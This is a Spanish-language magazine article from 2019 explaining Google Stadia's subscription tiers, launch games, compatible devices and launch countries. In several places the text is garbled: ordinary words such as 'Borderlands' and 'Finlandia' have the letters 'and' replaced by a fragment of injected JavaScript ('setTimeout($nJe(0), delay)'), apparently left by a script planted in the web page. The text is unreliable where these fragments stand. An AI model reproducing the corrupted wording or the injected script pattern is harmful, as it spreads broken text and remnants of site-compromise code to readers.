Todo lo que necesitas saber sobre Google Stadia

    Todo lo que necesitas saber sobre Google Stadia

    Pinta para ser el Netflix de los videojuegos.

    Autor: Zeynep Yenisey de Maxim US 24 octubre, 2019



    Google

     

    Google lanzará un nuevo servicio de juegos on demandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and en noviembre y lo llaman Google Stadia

     

     

    El servicio no requiere una consola y te permite jugar títulos de alta gama en tu navegador, teléfono y con Chromecast, todo por el costo de un control y una suscripción mensual de $10 dólares en Estados Unidos (unos 200 pesos mexicanos).Por ahora México no está contemplado, pero es un asunto que se resolverá con los meses.

     

    La suscripción se llama Stadia Pro Tier. Proporcionará sonido envolvente 4K, HDR, 5.1 y distribuirá títulos gratuitos de forma regular.

     

     

     

     

    Stadia Base Tier es la versión gratuita y limitará a los usuarios a gráficos de 1080p.

     

    Los juegos que ya se han anunciado para Stadia incluyen:

     

    Ghost Recon: Breakpoint
    Borderlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands 3
    Tom Clancy’s The Division 2
    NBA 2K20
    Mortal Kombat 11
    Red Dead Redemption II

     

     

     

     

    Para jugar el día del lanzamiento, los jugadores deben preordenar la edición del fundador de Stadia o la oferta de la edición Premiere. Eso incluirá un control de edición limitada y un dispositivo de transmisión Chromecast Ultra por $129 dólares (unos 2,400 pesos mexicanos)

     

     

    La edición Premiere viene con tres meses de Stadia Pro Tier y Destiny 2, y serás uno de los primeros en reclamar un Gamertag.

     

     

    Stadia solo funcionará en computadoras de escritorio y laptops que usen navegador Chrome, por ahora, así como en televisores que estén conectados a un dispositivo de transmisión Chromecast Ultra TV.

     

     

     

    Stadia es compatible con los modelos Google Pixel 3 y 4, y la compatibilidad con iPhone y iPad se lanzará más adelante.

     

     

    También se lanzará en Canadá, Reino Unido, Irlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anda, Francia, Alemania, Italia, España, Países Bajos, Bélgica, Dinamarca, Suecia, Noruega y Finlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andia. Google dice que para aquellos que pre-ordenaron, los servidores se abrirán a las 12 p.m. tiempo del este el 19 de noviembre.

     

     

     

     

    Temas relacionados con esta nota: , ,

Pinta para ser el Netflix de los videojuegos.